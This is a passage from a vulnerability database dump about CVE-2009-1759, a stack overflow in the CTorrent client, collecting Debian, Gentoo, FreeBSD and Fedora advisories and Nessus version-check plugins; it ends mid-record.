http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1.diff.gz\n Size/MD5 checksum: 6427 a8eb130df614638863d1de39f80aeb3c\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1.dsc\n Size/MD5 checksum: 1132 2159a81d35c934811cc4b65a5d51c63e\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2.orig.tar.gz\n Size/MD5 checksum: 201651 8c4605ea3a1f6d09da593c25b5ab7dbd\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_alpha.deb\n Size/MD5 checksum: 124858 5fce08bb15b4706ae4dc25c20a9da7b4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_amd64.deb\n Size/MD5 checksum: 112618 34ca707d68325c7b3939338d0b0ca7c2\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_arm.deb\n Size/MD5 checksum: 111212 8e4c1fa0ef849a48d3a87e5f68543520\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_armel.deb\n Size/MD5 checksum: 109968 60648ec18a34e50b483fbbf3dacba958\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_hppa.deb\n Size/MD5 checksum: 126318 e784df9d63ad73e20cc295f9afd3a436\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_i386.deb\n Size/MD5 checksum: 107962 d17a52c0f1c4f78cb912159719eaca5d\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_ia64.deb\n Size/MD5 checksum: 161648 179939230644da247cc342e8b2695df4\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_mips.deb\n Size/MD5 checksum: 123522 efe46dd5e1f6604d01e4e9dccedae3d6\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_mipsel.deb\n Size/MD5 checksum: 124204 5af9aa2d675d420684e78250663098a1\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_powerpc.deb\n Size/MD5 checksum: 123882 ee2163a4290b1c617e5b0a90caa7b4c4\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_s390.deb\n Size/MD5 checksum: 115012 fcb29b56a042601293a48ae9a406fc0b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_sparc.deb\n Size/MD5 checksum: 111682 149c6237664380b0d6c6cb74a3006e0d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2009-06-17T22:10:25", "published": "2009-06-17T22:10:25", "id": "DEBIAN:DSA-1817-1:FA2AD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00129.html", "title": "[SECURITY] [DSA 1817-1] New ctorrent packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "### Background\n\nCTorrent is a BitTorrent client implemented in C++ to be lightweight and quick. \n\n### Description\n\nCTorrent contains a stack-based buffer overflow in the btFiles::BuildFromMI function in trunk/btfiles.cpp. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted torrent file using CTorrent, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CTorrent users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-p2p/ctorrent-3.3.2-r1\"", "edition": 1, "modified": "2013-11-22T00:00:00", "published": "2013-11-20T00:00:00", "id": "GLSA-201311-11", "href": "https://security.gentoo.org/glsa/201311-11", "type": "gentoo", "title": "CTorrent: User-assisted arbitrary code execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "\nSecurityfocus reports:\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\n\t vulnerability because the software fails to properly\n\t bounds-check user-supplied input before copying it to an\n\t insufficiently sized memory buffer.\nSuccessful exploits allow remote attackers to execute\n\t arbitrary machine code in the context of a vulnerable\n\t application. Failed exploit attempts will likely result in\n\t denial-of-service conditions.\n\n", "edition": 4, "modified": "2009-10-15T00:00:00", "published": "2009-10-15T00:00:00", "id": "83D7D149-B965-11DE-A515-0022156E8794", "href": "https://vuxml.freebsd.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html", "title": "Enhanced cTorrent -- stack-based overflow", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "Enhanced CTorrent is a BitTorrent client for unix-like environments. High performance with minimal system resources and dependencies are a priority. ", "modified": "2009-08-25T04:42:00", "published": "2009-08-25T04:42:00", "id": "FEDORA:4FC6A10F8B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: ctorrent-1.3.4-7.dnh3.3.2.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "Enhanced CTorrent is a BitTorrent client for unix-like environments. High performance with minimal system resources and dependencies are a priority. ", "modified": "2009-08-25T04:27:00", "published": "2009-08-25T04:27:00", "id": "FEDORA:0A79010F877", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: ctorrent-1.3.4-10.dnh3.3.2.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:07:37", "description": "Security update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-08-25T00:00:00", "title": "Fedora 11 : ctorrent-1.3.4-10.dnh3.3.2.fc11 (2009-8897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-08-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:ctorrent", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8897.NASL", "href": "https://www.tenable.com/plugins/nessus/40758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8897.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40758);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_xref(name:\"FEDORA\", value:\"2009-8897\");\n\n script_name(english:\"Fedora 11 : ctorrent-1.3.4-10.dnh3.3.2.fc11 (2009-8897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501813\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028280.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?86788e38\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ctorrent package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"ctorrent-1.3.4-10.dnh3.3.2.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:37", "description": "Security update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-08-25T00:00:00", "title": "Fedora 10 : ctorrent-1.3.4-7.dnh3.3.2.fc10 (2009-8969)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-08-25T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:ctorrent"], "id": "FEDORA_2009-8969.NASL", "href": "https://www.tenable.com/plugins/nessus/40759", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8969.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40759);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_xref(name:\"FEDORA\", value:\"2009-8969\");\n\n script_name(english:\"Fedora 10 : ctorrent-1.3.4-7.dnh3.3.2.fc10 (2009-8969)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501813\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028372.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02a9f1d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ctorrent package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"ctorrent-1.3.4-7.dnh3.3.2.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:30", "description": "Michael Brooks discovered that ctorrent, a text-mode bittorrent\nclient, does not verify the length of file paths in torrent files. An\nattacker can exploit this via a crafted torrent that contains a long\nfile path to execute arbitrary code with the rights of the user\nopening the file.\n\nThe oldstable distribution (etch) does not contain ctorrent.", "edition": 26, "published": "2009-06-18T00:00:00", "title": "Debian DSA-1817-1 : ctorrent - stack-based buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-06-18T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:ctorrent"], "id": "DEBIAN_DSA-1817.NASL", "href": "https://www.tenable.com/plugins/nessus/39440", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1817. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39440);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_xref(name:\"DSA\", value:\"1817\");\n\n script_name(english:\"Debian DSA-1817-1 : ctorrent - stack-based buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michael Brooks discovered that ctorrent, a text-mode bittorrent\nclient, does not verify the length of file paths in torrent files. An\nattacker can exploit this via a crafted torrent that contains a long\nfile path to execute arbitrary code with the rights of the user\nopening the file.\n\nThe oldstable distribution (etch) does not contain ctorrent.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=530255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1817\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ctorrent packages.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"ctorrent\", reference:\"1.3.4-dnh3.2-1+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:46:42", "description": "Securityfocus reports :\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\nvulnerability because the software fails to properly bounds-check\nuser-supplied input before copying it to an insufficiently sized\nmemory buffer.\n\nSuccessful exploits allow remote attackers to execute arbitrary\nmachine code in the context of a vulnerable application. Failed\nexploit attempts will likely result in denial-of-service conditions.", "edition": 25, "published": "2009-10-30T00:00:00", "title": "FreeBSD : Enhanced cTorrent -- stack-based overflow (83d7d149-b965-11de-a515-0022156e8794)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-10-30T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ctorrent"], "id": "FREEBSD_PKG_83D7D149B96511DEA5150022156E8794.NASL", "href": "https://www.tenable.com/plugins/nessus/42310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42310);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n\n script_name(english:\"FreeBSD : Enhanced cTorrent -- stack-based overflow (83d7d149-b965-11de-a515-0022156e8794)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Securityfocus reports :\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\nvulnerability because the software fails to properly bounds-check\nuser-supplied input before copying it to an insufficiently sized\nmemory buffer.\n\nSuccessful exploits allow remote attackers to execute arbitrary\nmachine code in the context of a vulnerable application. Failed\nexploit attempts will likely result in denial-of-service conditions.\"\n );\n # http://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10585669\"\n );\n # https://vuxml.freebsd.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5528b800\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ctorrent<3.3.2_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:55:18", "description": "The remote host is affected by the vulnerability described in GLSA-201311-11\n(CTorrent: User-assisted arbitrary code execution)\n\n CTorrent contains a stack-based buffer overflow in the\n btFiles::BuildFromMI function in trunk/btfiles.cpp.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted\n torrent file using CTorrent, possibly resulting in execution of arbitrary\n code with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2013-11-21T00:00:00", "title": "GLSA-201311-11 : CTorrent: User-assisted arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2013-11-21T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ctorrent", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201311-11.NASL", "href": "https://www.tenable.com/plugins/nessus/70995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201311-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70995);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_xref(name:\"GLSA\", value:\"201311-11\");\n\n script_name(english:\"GLSA-201311-11 : CTorrent: User-assisted arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201311-11\n(CTorrent: User-assisted arbitrary code execution)\n\n CTorrent contains a stack-based buffer overflow in the\n btFiles::BuildFromMI function in trunk/btfiles.cpp.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted\n torrent file using CTorrent, possibly resulting in execution of arbitrary\n code with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201311-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CTorrent users should upgrade to the latest version:\n # emerge --sync\n 